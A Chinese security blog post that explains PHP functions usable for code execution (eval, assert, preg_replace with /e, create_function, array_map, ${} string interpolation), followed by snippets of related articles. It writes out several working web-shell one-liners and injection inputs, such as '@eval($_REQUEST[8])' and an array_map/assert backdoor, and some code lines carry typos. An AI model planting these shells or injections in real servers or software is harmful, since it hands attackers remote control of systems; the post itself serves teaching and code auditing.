php代码执行函数解析

最新推荐文章于 2024-06-20 01:32:06 发布
最新推荐文章于 2024-06-20 01:32:06 发布
阅读量3.4k 收藏 3
点赞数 1
文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xujunhui222/article/details/122875599
版权

**

php代码执行函数解析

**

​一、代码执行漏洞原理:
用户输入的数据被当做后端代码进行执行

<?php @eval($_REQUEST[8])?>//其实一句话木马的本质就是一个代码执行漏洞。用户输入的数据被当做代码进行执行。

这里提一下RCE(remote command/code execute)远程命令或者代码执行。现在只要渗透的最终情况可以实现执行命令或者是代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE
在PHP存在诸多函数可以做到代码执行。为了方便把要执行的代码写为$a

1.eval($a); //eval是代码执行用的最多的,他可以多行执行

eval(\$_REQUEST['a'];

2.assert($a); //只能单行执行
assert(\$_REQEUST['a'])//如何多行执行呢
写文件然后执行,例如:

file_put_contents('1.php','<?php var_dump(8);phpinfo();?>')

3.preg_replace() //正则替换函数,
preg_replace(’/a/’,‘x’,‘abc’);
Eg

<?php echo preg_replace('/a/e',$_GET[8],'abc')?>

替换必须真实发生才会触发函数,不发生替换,不会触发。

4.creae_function() 匿名函数
$a = create_function(’$id’,‘echo $id;’);
echo a ( 8 ) ; 类 似 于 f u n c t i o n 函 数 名 ( a(8); 类似于 function函数名( a(8);functionid){echo $id;}

<?php
\$a = $_REQUEST['a'];
$f2 = create_function('',$a);
$f2();
?>

这里还可以不调用触发:

<?php
\$a = $_REQUEST['a'];
$f2 = create_function('',$a);
//?a=}phpinfo();

5.array_map //回调函数调用某个函数。
下图是这个函数的用法,调用cube函数,传参
在这里插入图片描述

一句话木马:

array_map('assert',array($_POST['a']))array_map($_REQUSET['b'],$_REQUEST);

Eval 是无法调用的,因为eval比较特殊,不认为是函数属于特殊写法
call_user_func() 也可以回调,回调函数在php有很多。

6.特殊组合(双引号二次解析)
PHP版本5.5及其以上版本可以使用
“${phpinfo()}”; => 代码执行phpinfo()
php的字符串是可以使用复杂的表达式。例如${中间可以写调用的函数}

${phpinfo()};
$a = ${phpinfo()};
风无处不在
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
显示程序执行时间php函数代码
12-18
总结来说,`execute_time()` 函数是用于测量PHP脚本执行时间的一个实用工具,这有助于开发者理解代码性能并进行必要的优化。结合其他PHP时间处理函数和性能分析技巧,可以更全面地掌握程序运行情况。
php下过滤HTML代码函数
10-30
本文将深入探讨如何使用PHP函数来过滤和编码HTML,以确保用户输入的数据不会破坏网页结构或执行恶意代码。 首先,我们要明白XSS攻击的基本原理。XSS攻击是通过在网页上注入恶意的HTML、JavaScript或者其他可执行...
PHP代码执行函数
weixin_34309435的博客
03-27 1456
危险函数 mixed eval (string $code) 把字符串作为PHP代码执行 bool assert (mixed $assertion [,string $description]) 替代eval函数。相同功能。 mixed preg_replace(mixed $pattern,mixed $replacement,mixed $sub...
PHP-代码执行函数-命令执行函数
weixin_47112073的博客
10-21 6261
简单写一下代码执行函数与命令执行函数有哪些,并且说说他们的不同
PHP常见的命令执行函数代码执行函数_php命令执行函数
最新发布
2401_84254343的博客
06-20 369
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。使用用户自定义的比较函数对数组排序,并保持索引关联(不为元素分配新的键)。这里用的是POST型传参 POST型传参通过request body 传参 而GET型传参把参数包含在url中。第一个变量表示定义一个函数变量部分 第二个变量表示执行代码部分。array_filter — 使用回调函数过滤数组的元素。这个函数作用是为数组每个元素应用回调函数
Python中字符串类型代码执行函数——eval()、exec()和compile()
GMH的博客
02-01 2197
如果是single类型,表示这是一个单一语句,采用交互模式执行,在这种情况下,如果是一个表达式,一般会输出结果,而不是打印为None输出。参数,所以我们要将该递归函数转化成一个字符串,当然,格式还是要Python代码的格式来,注意换行和缩进。locals:该参数掌控局部的命名空间,功能和globals类型,不过当参数冲突时,会执行locals处的参数。如果是eval类型,表示这是一个单一的表达式语句,可以用来计算相应的值出来;flags:变量作用域,局部命名空间,如果被提供,可以是任何映射对象。
命令执行代码执行函数
浅笑996的博客
10-10 4279
命令执行函数 system () exec() shell_exec() passthru() popen() proc_popen() 代码执行函数 eval assert preg_replace call_user_func
命令执行代码执行
m0_62805300的博客
05-28 989
简介 命令执行 web应用提供调取外部应用、执行系统命令功能。用户利用这些功能执行系统命令,从而读取敏感信息、拿到系统权限。 代码执行 应用程序在调用一些能够将字符串转换为代码函数(如PHP中的eval(),eval可以将字符串当做函数进行执行)时,没有考虑用户是否控制这个字符串,将造成代码执行漏洞。一般很难通过黑盒查找漏洞,大部分都是根据源代码判断代码执行漏洞。 危险函数 命令执行函数: system(): 执行一个外部的应用程序并显示输出的结果 exec(): 执行一个外部的应.
PHP copy函数使用案例代码解析
10-14
`copy()`函数在成功执行时返回`TRUE`,如果发生错误则返回`FALSE`。这使得在程序中很容易通过检查返回值来判断文件拷贝是否成功。 ### 更新历史 - PHP 5.3.0:添加了对`context`的支持,提供了更多的文件操作灵活...
php分页函数示例代码分享
10-26
- **URL参数处理**:使用`parse_url()`函数解析URL,并通过正则表达式`preg_replace()`移除`page`参数,确保URL的正确性。 - **页面计算**:利用`ceil()`函数计算出总页数,并根据当前页码计算出前后页的页码。 - **...
PHP常见的命令执行函数代码执行函数
dys的博客
06-23 5586
命令执行代码执行
web渗透-文件包含漏洞利用>
weixin_45540964的博客
11-25 460
(1) .读取敏感文件 利用文件包含漏洞读取任意文件,读取文件的时候有利用条件 @目标主机文件存在 (目标文件的绝对路径,相对路径) @具有文件的可读权限 提交参数 绝对路径 ?path=c:\路径\ 尝试相对路径 ?path=..\..\..\..\..\..\路径\ (2) .直接包含图片木马 将木马信息写入图片附加信息中 图片附加信息 版权等. <?php @eval($_REQUEST[777])?> 使用菜刀连接 (3
一句话木马原理
热门推荐
北冥有鱼
04-21 1万+
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数种变形,但本质是不变的:木马的函数执行了我们发送的命令。 黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码: <%execute request(“value”)%> 其中value...
文件上传及upload-labs闯关
anananan145的博客
07-15 2923
文件上传
php eval可变函数,php eval函数的使用
weixin_36281055的博客
03-20 894
eval函数的定义和用法功能eval()函数把字符串按照PHP代码来计算。该字符串必须是合法的PHP代码,并且必须以分号结尾。总这,你要保证php代码能够解析他,就像你在php文件中使用一样。语法eval($strCode)返回值如果没有在代码中调用return语句,则返回NULL,如果代码中存在解析错误,则eval()函数返回false.代码示范:示范代码(eval的基本使用)$strTest=...
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8425
ThinkPHP5系列远程代码执行漏洞复现(详细)
文件上传漏洞
Zeker62的博客
09-07 392
目录文件上传漏洞简介上传漏洞类型前端JS绕过构建环境$_FILES()函数说明漏洞分析禁用浏览器的JS执行使用抓包软件修改拓展名传参修改前端JS代码绕过文件名过滤绕过环境搭建漏洞分析代码审计使用大小写绕过过滤Content-Type过滤绕过环境搭建漏洞分析代码审计更改Content-Type的值以绕过过滤判断文件头过滤绕过常见的图片文件头环境搭建漏洞分析.htaccess上传漏洞环境搭建漏洞分析...
【心得】PHP代码执行个人笔记
uuzeray的博客
11-15 449
(摘要)Code指脚本语言(php)的代码eval总结:eval(字符串) 表示将字符串按照php代码执行php动态函数调用命令执行代码执行的区别前者执行操作系统命令 或者执行 脚本语言的代码函数返回值 函数名字(函数参数);1 危险函数利用2 过滤了黑名单如果仅仅在代码中过滤了函数名称,那么大概率就等于 没过滤??`$_GET[2]`;无回显情况下的命令执行通道数据传输的路径shell_execsystem 相比,没有回显结果。
更小的asp后门
lake2的专栏
03-20 1万+
    上回在一个论坛看到有人问服务端限制提交数据为16字节能不能写个webshell到改为asp格式的数据库,所以就想了想,发现了这个更小的后门 :-)    你一定见过冰狐浪子的asp后门吧,呵呵,他的后门号称“最小的asp后门”,所以偶的这个只好是“更小的”了。    废话少说,先看看他的代码:javascript下的eval(Request.form(#)+)vbscript下的 
PHP代码审计:代码执行漏洞深度剖析
在双引号中,`${}`内的变量会被解析,这可能导致代码执行。以下是一些利用此特性的例子: 案例1: ```php <?php $data=$_GET['data']; eval("\$ret=strtolower('$data');"); echo $ret; ?> ``` 攻击者可以通过`test...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值